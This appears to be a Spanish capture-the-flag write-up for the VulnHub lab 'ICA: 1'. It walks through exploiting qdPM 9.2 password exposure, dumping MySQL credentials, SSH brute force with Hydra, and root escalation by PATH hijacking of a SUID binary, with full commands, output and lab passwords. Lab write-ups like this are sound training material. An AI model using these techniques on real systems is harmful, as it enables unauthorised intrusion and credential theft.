ICA: 1

Sobre esta maquina: VulnHub

Sistema Operativo: Linux

Skills Usados:

Reconfiguring machine interfaces for correct IP assignment via dhcp [Small bypass to circumvent the password]
Abusing qdPM 9.2 - Password Exposure (Unauthenticated)
Remote connection to the MYSQL service and obtaining user credentials
SSH brute force with Hydra
Abusing relative paths in a SUID binary - Path Hijacking [Privilege Escalation]

Metodologia:

Hacemos el primer reconocimiento con nmap:

// 
❯ nmap -T4 -sS -Pn -n -p- --open 192.168.1.141 -oN FirstScan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-30 16:18 EDT
Nmap scan report for 192.168.1.141
Host is up (0.00084s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
33060/tcp open mysqlx
MAC Address: 00:0C:29:03:0F:2F (VMware)

Hacemos un escaneo detallado de los puertos abiertos:

// 
nmap -T4 -sS -Pn -n -sVC -p22,80,3306,33060 192.168.1.141 -oN sVcScan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-30 16:20 EDT
Nmap scan report for 192.168.1.141
Host is up (0.00056s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0

7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 39
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, Speaks41ProtocolOld, SupportsCompression, LongPassword, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: \x08l\x1F3w=}J<0A\x0Ec'Z\x19\x0E\x02
|_ Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000

Vemos lo que corre en el puerto 80 (captura):

Vemos que es un servicio web de qdPM en version 9.2 , revisamos si hay alguna vulnerabilidad asociada en searchsploit:

// 
❯ searchsploit qdPM 9.2

Exploit Title | Path

qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt

Shellcodes: No Results

Conseguimos dos exploitsm utlizaremos el numero 2, al abrirlo 
nos indica que la password se almacena en un subdominio en 
particular YML el cual al ejecutarlo se nos descargara en la 
maquina y podriamos acceder:

The password and connection string for the database are
 stored in a yml file. To access the yml file you can go 
 to http:///core/config/databases.yml file and download.

Lo intentamos y se nos descarga.

Revisamos el documento yml:

// 
❯ cat databases.yml
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
File: databases.yml
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │
2 │ all:
3 │ doctrine:
4 │ class: sfDoctrineDatabase
5 │ param:
6 │ dsn: 'mysql:dbname=qdpm;host=localhost'
7 │ profiler: false
8 │ username: qdpmadmin
9 │ password: ""
10 │ attributes:
11 │ quote_identifier: true

Nos entrega usuario y credenciales de lo que parece ser el SQL server, intentamos ingresar:

// 
❯ mysql -uqdpmadmin -h 192.168.1.141 -p

Enter password:

MySQL [(none)]>

Ingresamos, ahora listamos las bases de datos.

MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema
| mysql
| performance_schema
| qdpm
| staff
| sys
+--------------------+

Seleccionamos Staff.

MySQL [(none)]> use staff.

Mostramos las tablas y tenemos usuarios, departamento y login. hechemos un vistazo.

MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+

Obtenemos ususarios y passwords:

MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+

MySQL [staff]> select * from user;

+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+

Las passwords estan en base 64, asi que crearemos un listado de usuarios y de passwords en texto claro:

Decodificamos base64 y lo almacenamos en un archivo users y passwords.

// 
❯ for password in c3VSSkFkR3dMcDhkeTNyRg== N1p3VjRxdGc0MmNtVVhHWA== WDdNUWtQM1cyOWZld0hkQw== REpjZVZ5OThXMjhZN3dMZw== Y3FObkJXQ0J5UzJEdUpTeQ==; do echo $password | base64 -d; echo; done | tee passwords

Intentaremos con Hydra hacer un ataque de fuerza bruta para conectarnos por ssh, utilizando las credenciales obtenidas:

// 
❯ hydra -L usuarios -P passwords ssh://192.168.1.141

[DATA] attacking ssh://192.168.1.141:22/
[22][ssh] host: 192.168.1.141 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 192.168.1.141 login: dexter password: 7ZwV4qtg42cmUXGX

Ingresamos por ssh con el usuario Travis:

// 
❯ ssh travis@192.168.1.141

Last login: Sat Sep 25 14:55:01 2021 from 192.168.1.7
travis@debian:~$ ls
user.txt
travis@debian:~$ cat user.txt
ICA{Secret_Project}

Nos convertimos en Dexter ahora:

// 
travis@debian:/home/travis$ su dexter
Password:

dexter@debian:

Descubrimos una nota:

dexter@debian:/home/travis$ cd
dexter@debian:/home/dexter$ ls
note.txt
dexter@debian:/home/dexter$ cat note.txt
It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.

Básicamente la nota nos indica que debemos explotar un SUID:

// 
dexter@debian:~$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null ;
-rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access
-rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 35040 Jul 28 2021 /usr/bin/umount
-rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 182600 Feb 27 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 71912 Jul 28 2021 /usr/bin/su
-rwsr-xr-x 1 root root 55528 Jul 28 2021 /usr/bin/mount
-rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 481608 Mar 13 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51336 Feb 21 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

La ruta /opt/get_access parece ser una buena pista:

Listamos las strings.

// 
dexter@debian:~$ strings /opt/get_access

u/UH
[]A\A]A^A_
cat /root/system.info

Podemos aprovecharnos de que esta ejecutando Cat para hacer un pathhijacking, vamos a los archivos temporales del sistema y nos creamos nuestro propio cat para despues darle permisos de ejecucion, y cambiar el path para que se ejecute primero por la ruta TMP:

// 
dexter@debian:~$ cd /tmp
dexter@debian:/tmp$ touch cat
dexter@debian:/tmp$ chmod +x cat
dexter@debian:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dexter@debian:/tmp$ export PATH=/tmp:$PATH
dexter@debian:/tmp$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Modificamos la funcionalidad de nuestro CAT:

Ejecutamos el proceso SUID y ya somos ROOT:

// 
dexter@debian:/tmp$ /opt/get_access
All services are disabled. Accessing to the system is allowed only within working hours.
dexter@debian:/tmp$ bash -p
bash-5.1# cd /root
bash-5.1# ls
root.txt system.info

Volvemos el PATH a la normalidad para que nos deje observar la ultima flag:

// 
bash-5.1# export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
bash-5.1# cat root.txt
ICA{Next_Generation_Self_Renewable_Genetics}

Y asi dariamos por finalizada esta maquina.

PreviousSymfonos 2 NextCorrosion 2

Last updated 28 days ago

// ❯ nmap -T4 -sS -Pn -n -p- --open 192.168.1.141 -oN FirstScan Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-30 16:18 EDT Nmap scan report for 192.168.1.141 Host is up (0.00084s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 33060/tcp open mysqlx MAC Address: 00:0C:29:03:0F:2F (VMware)

// nmap -T4 -sS -Pn -n -sVC -p22,80,3306,33060 192.168.1.141 -oN sVcScan Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-30 16:20 EDT Nmap scan report for 192.168.1.141 Host is up (0.00056s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA) | 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA) |_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0 7b:8e (ED25519) 80/tcp open http Apache httpd 2.4.48 ((Debian)) |_http-title: qdPM | Login |_http-server-header: Apache/2.4.48 (Debian) 3306/tcp open mysql MySQL 8.0.26 | mysql-info: | Protocol: 10 | Version: 8.0.26 | Thread ID: 39 | Capabilities flags: 65535 | Some Capabilities: Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, Speaks41ProtocolOld, SupportsCompression, LongPassword, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, SupportsLoadDataLocal, ODBCClient, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: \x08l\x1F3w=}J<0A\x0Ec'Z\x19\x0E\x02 |_ Auth Plugin Name: caching_sha2_password | ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate | Not valid before: 2021-09-25T10:47:29 |_Not valid after: 2031-09-23T10:47:29 |_ssl-date: TLS randomness does not represent time 33060/tcp open mysqlx? | fingerprint-strings: | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: | Invalid message" | HY000 | LDAPBindReq: | *Parse error unserializing protobuf message" | HY000 | oracle-tns: | Invalid message-frame." |_ HY000

// ❯ searchsploit qdPM 9.2 Exploit Title | Path qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt Shellcodes: No Results Conseguimos dos exploitsm utlizaremos el numero 2, al abrirlo nos indica que la password se almacena en un subdominio en particular YML el cual al ejecutarlo se nos descargara en la maquina y podriamos acceder: The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download.

// ❯ cat databases.yml ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── File: databases.yml ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 1 │ 2 │ all: 3 │ doctrine: 4 │ class: sfDoctrineDatabase 5 │ param: 6 │ dsn: 'mysql:dbname=qdpm;host=localhost' 7 │ profiler: false 8 │ username: qdpmadmin 9 │ password: "" 10 │ attributes: 11 │ quote_identifier: true

// ❯ mysql -uqdpmadmin -h 192.168.1.141 -p Enter password: MySQL [(none)]> Ingresamos, ahora listamos las bases de datos. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | mysql | performance_schema | qdpm | staff | sys +--------------------+ Seleccionamos Staff. MySQL [(none)]> use staff. Mostramos las tablas y tenemos usuarios, departamento y login. hechemos un vistazo. MySQL [staff]> show tables; +-----------------+ | Tables_in_staff | +-----------------+ | department | | login | | user | +-----------------+ Obtenemos ususarios y passwords: MySQL [staff]> select * from login; +------+---------+--------------------------+ | id | user_id | password | +------+---------+--------------------------+ | 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== | | 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== | | 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== | | 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== | | 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== | +------+---------+--------------------------+ MySQL [staff]> select * from user; +------+---------------+--------+---------------------------+ | id | department_id | name | role | +------+---------------+--------+---------------------------+ | 1 | 1 | Smith | Cyber Security Specialist | | 2 | 2 | Lucas | Computer Engineer | | 3 | 1 | Travis | Intelligence Specialist | | 4 | 1 | Dexter | Cyber Security Analyst | | 5 | 2 | Meyer | Genetic Engineer | +------+---------------+--------+---------------------------+

// ❯ for password in c3VSSkFkR3dMcDhkeTNyRg== N1p3VjRxdGc0MmNtVVhHWA== WDdNUWtQM1cyOWZld0hkQw== REpjZVZ5OThXMjhZN3dMZw== Y3FObkJXQ0J5UzJEdUpTeQ==; do echo $password | base64 -d; echo; done | tee passwords

// ❯ hydra -L usuarios -P passwords ssh://192.168.1.141 [DATA] attacking ssh://192.168.1.141:22/ [22][ssh] host: 192.168.1.141 login: travis password: DJceVy98W28Y7wLg [22][ssh] host: 192.168.1.141 login: dexter password: 7ZwV4qtg42cmUXGX

// travis@debian:/home/travis$ su dexter Password: dexter@debian: Descubrimos una nota: dexter@debian:/home/travis$ cd dexter@debian:/home/dexter$ ls note.txt dexter@debian:/home/dexter$ cat note.txt It seems to me that there is a weakness while accessing the system. As far as I know, the contents of executable files are partially viewable. I need to find out if there is a vulnerability or not.

// dexter@debian:~$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null ; -rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access -rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn -rwsr-xr-x 1 root root 35040 Jul 28 2021 /usr/bin/umount -rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd -rwsr-xr-x 1 root root 182600 Feb 27 2021 /usr/bin/sudo -rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd -rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp -rwsr-xr-x 1 root root 71912 Jul 28 2021 /usr/bin/su -rwsr-xr-x 1 root root 55528 Jul 28 2021 /usr/bin/mount -rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh -rwsr-xr-x 1 root root 481608 Mar 13 2021 /usr/lib/openssh/ssh-keysign -rwsr-xr-- 1 root messagebus 51336 Feb 21 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

// dexter@debian:~$ cd /tmp dexter@debian:/tmp$ touch cat dexter@debian:/tmp$ chmod +x cat dexter@debian:/tmp$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games dexter@debian:/tmp$ export PATH=/tmp:$PATH dexter@debian:/tmp$ echo $PATH /tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

// dexter@debian:/tmp$ /opt/get_access All services are disabled. Accessing to the system is allowed only within working hours. dexter@debian:/tmp$ bash -p bash-5.1# cd /root bash-5.1# ls root.txt system.info